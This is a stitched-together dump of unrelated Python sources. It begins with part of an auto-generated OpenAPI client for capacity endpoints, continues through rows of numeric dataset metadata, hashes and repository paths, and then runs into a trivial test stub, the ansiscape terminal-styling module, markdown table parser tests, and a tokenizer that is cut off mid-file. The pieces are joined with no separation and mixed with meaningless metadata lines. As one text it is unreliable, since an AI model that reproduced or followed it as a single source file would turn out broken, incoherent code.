return self.find_capacity_for_metro_with_http_info(**kwargs) # noqa: E501
def find_capacity_for_metro_with_http_info(self, **kwargs): # noqa: E501
"""View capacity for metros # noqa: E501
Returns a list of metros and plans with their current capacity. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_capacity_for_metro_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(MetroCapacityList, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method find_capacity_for_metro" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
200: "MetroCapacityList",
401: "Error",
}
return self.api_client.call_api(
'/capacity/metros', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def find_organization_capacity_per_facility(self, id, **kwargs): # noqa: E501
"""View available hardware plans per Facility for given organization # noqa: E501
Returns a list of facilities and plans with their current capacity. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_organization_capacity_per_facility(id, async_req=True)
>>> result = thread.get()
:param id: Organization UUID (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: CapacityList
"""
kwargs['_return_http_data_only'] = True
return self.find_organization_capacity_per_facility_with_http_info(id, **kwargs) # noqa: E501
def find_organization_capacity_per_facility_with_http_info(self, id, **kwargs): # noqa: E501
"""View available hardware plans per Facility for given organization # noqa: E501
Returns a list of facilities and plans with their current capacity. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_organization_capacity_per_facility_with_http_info(id, async_req=True)
>>> result = thread.get()
:param id: Organization UUID (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(CapacityList, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method find_organization_capacity_per_facility" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `find_organization_capacity_per_facility`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
200: "CapacityList",
401: "Error",
403: "Error",
}
return self.api_client.call_api(
'/organizations/{id}/capacity', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def find_organization_capacity_per_metro(self, id, **kwargs): # noqa: E501
"""View available hardware plans per Metro for given organization # noqa: E501
Returns a list of metros and plans with their current capacity. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_organization_capacity_per_metro(id, async_req=True)
>>> result = thread.get()
:param id: Organization UUID (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: MetroCapacityList
"""
kwargs['_return_http_data_only'] = True
return self.find_organization_capacity_per_metro_with_http_info(id, **kwargs) # noqa: E501
def find_organization_capacity_per_metro_with_http_info(self, id, **kwargs): # noqa: E501
"""View available hardware plans per Metro for given organization # noqa: E501
Returns a list of metros and plans with their current capacity. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_organization_capacity_per_metro_with_http_info(id, async_req=True)
>>> result = thread.get()
:param id: Organization UUID (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(MetroCapacityList, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method find_organization_capacity_per_metro" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `find_organization_capacity_per_metro`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
200: "MetroCapacityList",
401: "Error",
403: "Error",
}
return self.api_client.call_api(
'/organizations/{id}/capacity/metros', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
| 42.857988
| 312
| 0.59514
| 3,963
| 36,215
| 5.180419
| 0.059551
| 0.031953
| 0.047735
| 0.031564
| 0.950852
| 0.945251
| 0.944618
| 0.937068
| 0.932733
| 0.924208
| 0
| 0.012868
| 0.336932
| 36,215
| 844
| 313
| 42.908768
| 0.842086
| 0.495402
| 0
| 0.742547
| 0
| 0
| 0.164681
| 0.052303
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03523
| false
| 0
| 0.01355
| 0
| 0.084011
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e5fc9c9f2ae31f5f6eb9c65e3b6b0811d84a613c
| 89
|
py
|
Python
|
hardware/tests/test_remove.py
|
y3rsh/opentrons
|
b446567910db218030fef40396ab2255cc074bba
|
[
"Apache-2.0"
] | 235
|
2017-10-27T20:37:27.000Z
|
2022-03-30T14:09:49.000Z
|
hardware/tests/test_remove.py
|
y3rsh/opentrons
|
b446567910db218030fef40396ab2255cc074bba
|
[
"Apache-2.0"
] | 8,425
|
2017-10-26T15:25:43.000Z
|
2022-03-31T23:54:26.000Z
|
hardware/tests/test_remove.py
|
y3rsh/opentrons
|
b446567910db218030fef40396ab2255cc074bba
|
[
"Apache-2.0"
] | 130
|
2017-11-09T21:02:37.000Z
|
2022-03-15T18:01:24.000Z
|
"""A dummy test."""
def test_remove() -> None:
"""A dummy test."""
assert True
| 12.714286
| 26
| 0.539326
| 12
| 89
| 3.916667
| 0.666667
| 0.255319
| 0.425532
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.247191
| 89
| 6
| 27
| 14.833333
| 0.701493
| 0.303371
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f9191366e93391df510ee0a953e79053dea7e68b
| 8,970
|
py
|
Python
|
ansiscape/__init__.py
|
cariad/ansiscape
|
07118b68729fcdc2198fc69c35bb1e9ef1bb5b80
|
[
"MIT"
] | null | null | null |
ansiscape/__init__.py
|
cariad/ansiscape
|
07118b68729fcdc2198fc69c35bb1e9ef1bb5b80
|
[
"MIT"
] | 30
|
2021-09-05T13:56:21.000Z
|
2021-10-05T11:14:11.000Z
|
ansiscape/__init__.py
|
cariad/ansiscape
|
07118b68729fcdc2198fc69c35bb1e9ef1bb5b80
|
[
"MIT"
] | null | null | null |
from ansiscape.enums import InterpretationKey, NamedColor, SelectGraphicRendition
from ansiscape.handlers import get_color_interpreter, get_interpreter_for_sgr
from ansiscape.interpreters import register_interpreters
from ansiscape.sequence import Sequence
from ansiscape.types import Color, Interpretation, SequencePart, SequenceType
from ansiscape.version import get_version
register_interpreters()
def alternative_font_0(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FONT_ALT_0, *parts)
def alternative_font_1(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FONT_ALT_1, *parts)
def alternative_font_2(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FONT_ALT_2, *parts)
def alternative_font_3(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FONT_ALT_3, *parts)
def alternative_font_4(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FONT_ALT_4, *parts)
def alternative_font_5(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FONT_ALT_5, *parts)
def alternative_font_6(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FONT_ALT_6, *parts)
def alternative_font_7(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FONT_ALT_7, *parts)
def alternative_font_8(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FONT_ALT_8, *parts)
def background(color: Color, *parts: SequencePart) -> SequenceType:
i = get_color_interpreter(InterpretationKey.BACKGROUND)
return i.make_sequence(color, *parts)
def black(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FOREGROUND_BLACK, *parts)
def black_background(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.BACKGROUND_BLACK, *parts)
def blackletter(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.CALLIGRAPHY_BLACKLETTER, *parts)
def blue(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FOREGROUND_BLUE, *parts)
def blue_background(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.BACKGROUND_BLUE, *parts)
def bright_black(*parts: SequencePart) -> SequenceType:
return foreground(NamedColor.BRIGHT_BLACK, *parts)
def bright_black_background(*parts: SequencePart) -> SequenceType:
return background(NamedColor.BRIGHT_BLACK, *parts)
def bright_blue(*parts: SequencePart) -> SequenceType:
return foreground(NamedColor.BRIGHT_BLUE, *parts)
def bright_blue_background(*parts: SequencePart) -> SequenceType:
return background(NamedColor.BRIGHT_BLUE, *parts)
def bright_cyan(*parts: SequencePart) -> SequenceType:
return foreground(NamedColor.BRIGHT_CYAN, *parts)
def bright_cyan_background(*parts: SequencePart) -> SequenceType:
return background(NamedColor.BRIGHT_CYAN, *parts)
def bright_green(*parts: SequencePart) -> SequenceType:
return foreground(NamedColor.BRIGHT_GREEN, *parts)
def bright_green_background(*parts: SequencePart) -> SequenceType:
return background(NamedColor.BRIGHT_GREEN, *parts)
def bright_magenta(*parts: SequencePart) -> SequenceType:
return foreground(NamedColor.BRIGHT_MAGENTA, *parts)
def bright_magenta_background(*parts: SequencePart) -> SequenceType:
return background(NamedColor.BRIGHT_MAGENTA, *parts)
def bright_red(*parts: SequencePart) -> SequenceType:
return foreground(NamedColor.BRIGHT_RED, *parts)
def bright_red_background(*parts: SequencePart) -> SequenceType:
return background(NamedColor.BRIGHT_RED, *parts)
def bright_white(*parts: SequencePart) -> SequenceType:
return foreground(NamedColor.BRIGHT_WHITE, *parts)
def bright_white_background(*parts: SequencePart) -> SequenceType:
return background(NamedColor.BRIGHT_WHITE, *parts)
def bright_yellow(*parts: SequencePart) -> SequenceType:
return foreground(NamedColor.BRIGHT_YELLOW, *parts)
def bright_yellow_background(*parts: SequencePart) -> SequenceType:
return background(NamedColor.BRIGHT_YELLOW, *parts)
def circle(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FRAME_CIRCLE, *parts)
def conceal(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.CONCEAL_ON, *parts)
def cyan(*parts: SequencePart) -> SequenceType:
return foreground(NamedColor.CYAN, *parts)
def cyan_background(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.BACKGROUND_CYAN, *parts)
def double_line_under_or_right(*parts: SequencePart) -> SequenceType:
return make_sequence(
SelectGraphicRendition.IDEOGRAM_DOUBLE_LINE_UNDER_OR_RIGHT,
*parts,
)
def double_line_over_or_left(*parts: SequencePart) -> SequenceType:
return make_sequence(
SelectGraphicRendition.IDEOGRAM_DOUBLE_LINE_OVER_OR_LEFT,
*parts,
)
def double_underline(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.UNDERLINE_DOUBLE, *parts)
def fast_blink(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.BLINK_FAST, *parts)
def foreground(color: Color, *parts: SequencePart) -> SequenceType:
i = get_color_interpreter(InterpretationKey.FOREGROUND)
return i.make_sequence(color, *parts)
def frame(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FRAME_BOX, *parts)
def green(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FOREGROUND_GREEN, *parts)
def green_background(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.BACKGROUND_GREEN, *parts)
def heavy(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.WEIGHT_HEAVY, *parts)
def invert(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.INVERT_ON, *parts)
def italic(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.CALLIGRAPHY_ITALIC, *parts)
def light(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.WEIGHT_LIGHT, *parts)
def magenta(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FOREGROUND_MAGENTA, *parts)
def magenta_background(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.BACKGROUND_MAGENTA, *parts)
def make_sequence(sgr: SelectGraphicRendition, *parts: SequencePart) -> SequenceType:
i = get_interpreter_for_sgr(sgr)
return i.make_sequence(sgr, *parts)
def overline(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.OVERLINE_ON, *parts)
def proportional_spacing(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.PROPORTIONAL_SPACING_ON, *parts)
def red(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FOREGROUND_RED, *parts)
def red_background(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.BACKGROUND_RED, *parts)
def sequence(*parts: SequencePart) -> SequenceType:
return Sequence(*parts)
def single_line_under_or_right(*parts: SequencePart) -> SequenceType:
return make_sequence(
SelectGraphicRendition.IDEOGRAM_SINGLE_LINE_UNDER_OR_RIGHT,
*parts,
)
def single_line_over_or_left(*parts: SequencePart) -> SequenceType:
return make_sequence(
SelectGraphicRendition.IDEOGRAM_SINGLE_LINE_OVER_OR_LEFT,
*parts,
)
def single_underline(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.UNDERLINE_SINGLE, *parts)
def slow_blink(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.BLINK_SLOW, *parts)
def strike(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.STRIKE_ON, *parts)
def stress(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.IDEOGRAM_STRESS, *parts)
def white(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FOREGROUND_WHITE, *parts)
def white_background(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.BACKGROUND_WHITE, *parts)
def yellow(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FOREGROUND_YELLOW, *parts)
def yellow_background(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.BACKGROUND_YELLOW, *parts)
__all__ = [
"get_version",
"Interpretation",
"Sequence",
]
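The module above exposes one thin wrapper per SGR attribute, all funnelling through make_sequence(). A small illustrative composition follows; it assumes that a SequencePart may itself be another sequence (nesting) and that rendering the resulting Sequence to a terminal is handled by the Sequence/SequenceType interface defined outside this file.
# Illustrative only: compose a few of the helpers defined above.
warning = yellow("warning: ", heavy("disk almost full"))      # nested parts assumed allowed
alert = background(NamedColor.BRIGHT_RED, bright_white("FATAL"))
plain = sequence("no styling, just a wrapper around Sequence(*parts)")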
| 30.824742
| 85
| 0.78796
| 927
| 8,970
| 7.381877
| 0.0863
| 0.231477
| 0.275464
| 0.317112
| 0.800088
| 0.780944
| 0.716645
| 0.576355
| 0.334356
| 0.081835
| 0
| 0.002281
| 0.120067
| 8,970
| 290
| 86
| 30.931034
| 0.86469
| 0
| 0
| 0.063694
| 0
| 0
| 0.003679
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.414013
| false
| 0
| 0.038217
| 0.394904
| 0.866242
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
00f46f858f83b7ae790eff1489124903e170aabb
| 7,391
|
py
|
Python
|
tests/test_blockparser_table.py
|
tk0miya/pycmark-gfm
|
db31d034c592fa3139a7bc672b0eae7a6fefa7d9
|
[
"Apache-2.0"
] | 1
|
2019-05-12T07:21:02.000Z
|
2019-05-12T07:21:02.000Z
|
tests/test_blockparser_table.py
|
tk0miya/pycmark-gfm
|
db31d034c592fa3139a7bc672b0eae7a6fefa7d9
|
[
"Apache-2.0"
] | null | null | null |
tests/test_blockparser_table.py
|
tk0miya/pycmark-gfm
|
db31d034c592fa3139a7bc672b0eae7a6fefa7d9
|
[
"Apache-2.0"
] | null | null | null |
"""
test_blockparser_table
~~~~~~~~~~~~~~~~~~~~~~
:copyright: Copyright 2019 by Takeshi KOMIYA
:license: Apache License 2.0, see LICENSE for details.
"""
from docutils import nodes
from utils import publish, assert_node
def test_example_191():
text = ("| foo | bar |\n"
"| --- | --- |\n"
"| baz | bim |\n")
result = publish(text)
assert_node(result, [nodes.document, nodes.table, nodes.tgroup, (nodes.colspec,
nodes.colspec,
nodes.thead,
nodes.tbody)])
assert_node(result[0][0][2], [nodes.thead, nodes.row, ([nodes.entry, nodes.paragraph, "foo"],
[nodes.entry, nodes.paragraph, "bar"])])
assert_node(result[0][0][3], [nodes.tbody, nodes.row, ([nodes.entry, nodes.paragraph, "baz"],
[nodes.entry, nodes.paragraph, "bim"])])
def test_example_192():
text = ("| abc | defghi |\n"
":-: | -----------:\n"
"bar | baz\n")
result = publish(text)
assert_node(result, [nodes.document, nodes.table, nodes.tgroup, (nodes.colspec,
nodes.colspec,
nodes.thead,
nodes.tbody)])
assert_node(result[0][0][2], [nodes.thead, nodes.row, ([nodes.entry, nodes.paragraph, "abc"],
[nodes.entry, nodes.paragraph, "defghi"])])
assert_node(result[0][0][3], [nodes.tbody, nodes.row, ([nodes.entry, nodes.paragraph, "bar"],
[nodes.entry, nodes.paragraph, "baz"])])
assert_node(result[0][0][2][0][0], align="center")
assert_node(result[0][0][2][0][1], align="right")
assert_node(result[0][0][3][0][0], align="center")
assert_node(result[0][0][3][0][1], align="right")
def test_example_193():
text = ("| f\\|oo |\n"
"| ------ |\n"
"| b `\\|` az |\n"
"| b **\\|** im |\n")
result = publish(text)
assert_node(result, [nodes.document, nodes.table, nodes.tgroup, (nodes.colspec,
nodes.thead,
nodes.tbody)])
assert_node(result[0][0][1], [nodes.thead, nodes.row, nodes.entry, nodes.paragraph, "f|oo"])
assert_node(result[0][0][2], [nodes.tbody, ([nodes.row, nodes.entry, nodes.paragraph, ("b ",
[nodes.literal, "|"],
" az")],
[nodes.row, nodes.entry, nodes.paragraph, ("b ",
[nodes.strong, "|"],
" im")])])
def test_example_194():
text = ("| abc | def |\n"
"| --- | --- |\n"
"| bar | baz |\n"
"> bar\n")
result = publish(text)
assert_node(result, [nodes.document, ([nodes.table, nodes.tgroup, (nodes.colspec,
nodes.colspec,
nodes.thead,
nodes.tbody)],
[nodes.block_quote, nodes.paragraph, "bar"])])
assert_node(result[0][0][2], [nodes.thead, nodes.row, ([nodes.entry, nodes.paragraph, "abc"],
[nodes.entry, nodes.paragraph, "def"])])
assert_node(result[0][0][3], [nodes.tbody, nodes.row, ([nodes.entry, nodes.paragraph, "bar"],
[nodes.entry, nodes.paragraph, "baz"])])
def test_example_195():
text = ("| abc | def |\n"
"| --- | --- |\n"
"| bar | baz |\n"
"bar\n"
"\n"
"bar\n")
result = publish(text)
assert_node(result, [nodes.document, ([nodes.table, nodes.tgroup, (nodes.colspec,
nodes.colspec,
nodes.thead,
nodes.tbody)],
[nodes.paragraph, "bar"])])
assert_node(result[0][0][2], [nodes.thead, nodes.row, ([nodes.entry, nodes.paragraph, "abc"],
[nodes.entry, nodes.paragraph, "def"])])
assert_node(result[0][0][3], [nodes.tbody, ([nodes.row, ([nodes.entry, nodes.paragraph, "bar"],
[nodes.entry, nodes.paragraph, "baz"])],
[nodes.row, ([nodes.entry, nodes.paragraph, "bar"],
nodes.entry)])])
def test_example_196():
text = ("| abc | def |\n"
"| --- |\n"
"| bar |\n")
result = publish(text)
assert_node(result, [nodes.document, nodes.paragraph, text.strip()])
def test_example_197():
text = ("| abc | def |\n"
"| --- | --- |\n"
"| bar |\n"
"| bar | baz | boo |\n")
result = publish(text)
assert_node(result, [nodes.document, nodes.table, nodes.tgroup, (nodes.colspec,
nodes.colspec,
nodes.thead,
nodes.tbody)])
assert_node(result[0][0][2], [nodes.thead, nodes.row, ([nodes.entry, nodes.paragraph, "abc"],
[nodes.entry, nodes.paragraph, "def"])])
assert_node(result[0][0][3], [nodes.tbody, ([nodes.row, ([nodes.entry, nodes.paragraph, "bar"],
nodes.entry)],
[nodes.row, ([nodes.entry, nodes.paragraph, "bar"],
[nodes.entry, nodes.paragraph, "baz"])])])
def test_example_198():
text = ("| abc | def |\n"
"| --- | --- |\n")
result = publish(text)
assert_node(result, [nodes.document, nodes.table, nodes.tgroup, (nodes.colspec,
nodes.colspec,
nodes.thead)])
assert_node(result[0][0][2], [nodes.thead, nodes.row, ([nodes.entry, nodes.paragraph, "abc"],
[nodes.entry, nodes.paragraph, "def"])])
| 53.557971
| 112
| 0.375727
| 612
| 7,391
| 4.464052
| 0.107843
| 0.153734
| 0.153734
| 0.237189
| 0.846266
| 0.835652
| 0.832723
| 0.800878
| 0.747804
| 0.708638
| 0
| 0.023159
| 0.480043
| 7,391
| 137
| 113
| 53.948905
| 0.687744
| 0.019754
| 0
| 0.539823
| 0
| 0
| 0.069796
| 0
| 0
| 0
| 0
| 0
| 0.230089
| 1
| 0.070796
| false
| 0
| 0.017699
| 0
| 0.088496
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dab1327bc821333d4464e6555e5e28efc3f517b0
| 973
|
py
|
Python
|
articlenizer/tokenize.py
|
BeTKH/articlenizer
|
7f18a630c71fcb7c80c710b9ef3870e460f49cac
|
[
"MIT"
] | 1
|
2022-01-04T11:58:36.000Z
|
2022-01-04T11:58:36.000Z
|
articlenizer/tokenize.py
|
BeTKH/articlenizer
|
7f18a630c71fcb7c80c710b9ef3870e460f49cac
|
[
"MIT"
] | null | null | null |
articlenizer/tokenize.py
|
BeTKH/articlenizer
|
7f18a630c71fcb7c80c710b9ef3870e460f49cac
|
[
"MIT"
] | 1
|
2022-02-15T17:09:37.000Z
|
2022-02-15T17:09:37.000Z
|
import re
# TODO numbers such as 10,000 and stuff such as R&D
TOKENIZATION_REGEX = re.compile(r'((?:10.1371.journal.[a-z]+.[a-z0-9\.]+)|https?\:\/\/[a-zA-Z0-9\-\.]+[\w\/\._\-\:~\?=#%]*[\w\/_\-\:~\?=#%]|ftp\:\/\/[a-zA-Z0-9\-\.]+[\w\/\._\-\:~\?=#%]*[\w\/_\-\:~\?=#%]|www\.[a-zA-Z0-9\-\.]+[\w\/\._\-\:~\?=#%]*|[a-zA-Z0-9\-\.]+\.org\/[\w\/_\-\:~\?=#%]*|[a-zA-Z0-9\-\.]+\.edu\/[\w\/_\-\:~\?=#%]*|[\.0-9]+[0-9][a-zA-Z]+|v\.|ver\.|V\.|Ver\.|e\.g\.|i\.e\.|i\.v\.|[0-9]{1,3},[0-9]{3},[0-9]{3}|[0-9]{1,3},[0-9]{3}|\[[0-9\-,\?]+\]|[0-9\.]*\.[0-9]+[a-zA-Z]*|[\.0-9]+[a-zA-Z]+|[a-qs-uw-zA-QS-UW-Z]+[0-9][a-zA-Z]+|[a-qs-uw-zA-QS-UW-Z][0-9]+[a-zA-Z]?|[a-zA-Z]+&[a-zA-Z]+|[a-zA-Z]+\.[a-zA-Z]+|[a-zA-Z]+|[0-9]+|[^0-9a-zA-Z\s])')
def tokenize(line):
"""Tokenize a string based on a regular expression
Args:
line (string): string to tokenize
Returns:
list of string: list of individual tokens
"""
return [t for t in TOKENIZATION_REGEX.split(line) if t]
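A quick illustrative call to the tokenize() helper defined above; token boundaries depend entirely on TOKENIZATION_REGEX, so no exact output is claimed here.
if __name__ == "__main__":
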